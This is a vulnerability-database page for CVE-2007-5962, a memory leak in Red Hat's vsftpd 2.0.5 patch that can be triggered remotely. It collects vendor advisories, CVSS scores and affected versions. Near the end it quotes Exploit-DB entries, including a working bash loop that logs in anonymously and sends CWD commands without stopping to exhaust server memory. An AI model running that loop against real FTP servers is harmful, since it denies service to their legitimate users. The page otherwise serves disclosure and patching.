CVE-2007-5962
published 2008-05-22CVE-2007-5962: Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath…
PriorityP336high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
12.06%
95.7th percentile
Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.
Affected
36 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vsftpd | — | — |
| redhat | enterprise_linux | — | — |
| redhat | fedora | — | — |
| redhat | fedora | — | — |
| redhat | fedora | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
| redhat | vsftpd | — | — |
CVSS provenance
nvdv2.07.1HIGHAV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_debian7.1LOW
vendor_redhat7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-8hxj-gw9h-vgfv: Memory leak in a certain Red Hat deployment of vsftpd before 2
ghsa_unreviewed·2022-05-01·CVSS 7.1
CVE-2008-2375 [HIGH] GHSA-8hxj-gw9h-vgfv: Memory leak in a certain Red Hat deployment of vsftpd before 2
Memory leak in a certain Red Hat deployment of vsftpd before 2.0.5 on Red Hat Enterprise Linux (RHEL) 3 and 4, when PAM is used, allows remote attackers to cause a denial of service (memory consumption) via a large number of invalid authentication attempts within the same session, a different vulnerability than CVE-2007-5962.
GHSA
GHSA-67jj-2hgw-486p: Memory leak in a certain Red Hat patch, applied to vsftpd 2
ghsa_unreviewed·2022-05-01
CVE-2007-5962 [HIGH] GHSA-67jj-2hgw-486p: Memory leak in a certain Red Hat patch, applied to vsftpd 2
Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.
Red Hat
vsftpd: memory leak when deny_file option is set
vendor_redhat·2008-05-21·CVSS 7.1
CVE-2007-5962 [HIGH] CWE-401 vsftpd: memory leak when deny_file option is set
vsftpd: memory leak when deny_file option is set
Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.
Debian
CVE-2008-2375: vsftpd - Memory leak in a certain Red Hat deployment of vsftpd before 2.0.5 on Red Hat En...
vendor_debian·2008·CVSS 7.1
CVE-2008-2375 [HIGH] CVE-2008-2375: vsftpd - Memory leak in a certain Red Hat deployment of vsftpd before 2.0.5 on Red Hat En...
Memory leak in a certain Red Hat deployment of vsftpd before 2.0.5 on Red Hat Enterprise Linux (RHEL) 3 and 4, when PAM is used, allows remote attackers to cause a denial of service (memory consumption) via a large number of invalid authentication attempts within the same session, a different vulnerability than CVE-2007-5962.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Debian
CVE-2007-5962: vsftpd - Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enter...
vendor_debian·2007·CVSS 7.1
CVE-2007-5962 [HIGH] CVE-2007-5962: vsftpd - Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enter...
Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Red Hat
older vsftpd authentication memory leak
vendor_redhat·2006-06-28·CVSS 7.1
CVE-2008-2375 [HIGH] CWE-401 older vsftpd authentication memory leak
older vsftpd authentication memory leak
Memory leak in a certain Red Hat deployment of vsftpd before 2.0.5 on Red Hat Enterprise Linux (RHEL) 3 and 4, when PAM is used, allows remote attackers to cause a denial of service (memory consumption) via a large number of invalid authentication attempts within the same session, a different vulnerability than CVE-2007-5962.
No detection rules found.
Exploit-DB
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption
exploitdb·2008-06-14
CVE-2007-5962 vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption
---
#!/usr/bin/perl -w
#######################################################################################
# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
#
# I tried to modify local exploit found at securityfocus such that we can remotely exloit
#
# Author shall not bear any responsibility
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 07th June, 2008
#
#
##############################################
Exploit-DB
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
exploitdb·2008-05-21
CVE-2007-5962 vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
---
source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
#!/usr/bin/perl -w
#######################################################################################
#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
#
#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
#option in /etc/vsftpd/vsftpd.conf or the path where FTP ser
Exploit-DB
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
exploitdb·2008-05-21
CVE-2007-5962 vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
---
source: https://www.securityfocus.com/bid/29322/info
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
# echo deny_file=foo >> /etc/vsftpd/vsftpd.conf
# service vsftpd restart
$ cat > memtest.sh <<EOF
EOF
#!/bin/bash
echo USER anonymous
echo PASS [email protected]
while [ 1 ]; do
echo CWD pub
echo CWD ..
done
EOF
http://secunia.com/advisories/30341http://secunia.com/advisories/30354http://securitytracker.com/id?1020079http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0185http://www.openwall.com/lists/oss-security/2008/05/21/10http://www.openwall.com/lists/oss-security/2008/05/21/12http://www.openwall.com/lists/oss-security/2008/05/21/8http://www.redhat.com/support/errata/RHSA-2008-0295.htmlhttp://www.securityfocus.com/archive/1/493167/100/0/threadedhttp://www.securityfocus.com/bid/29322http://www.vupen.com/english/advisories/2008/1600https://bugzilla.redhat.com/show_bug.cgi?id=397011https://exchange.xforce.ibmcloud.com/vulnerabilities/42593https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8850https://www.exploit-db.com/exploits/5814https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00681.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-May/msg00691.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-May/msg00699.htmlhttp://secunia.com/advisories/30341http://secunia.com/advisories/30354http://securitytracker.com/id?1020079http://wiki.rpath.com/wiki/Advisories:rPSA-2008-0185http://www.openwall.com/lists/oss-security/2008/05/21/10http://www.openwall.com/lists/oss-security/2008/05/21/12http://www.openwall.com/lists/oss-security/2008/05/21/8http://www.redhat.com/support/errata/RHSA-2008-0295.htmlhttp://www.securityfocus.com/archive/1/493167/100/0/threadedhttp://www.securityfocus.com/bid/29322http://www.vupen.com/english/advisories/2008/1600https://bugzilla.redhat.com/show_bug.cgi?id=397011https://exchange.xforce.ibmcloud.com/vulnerabilities/42593https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8850https://www.exploit-db.com/exploits/5814https://www.redhat.com/archives/fedora-package-announce/2008-May/msg00681.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-May/msg00691.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-May/msg00699.html
2008-05-22
Published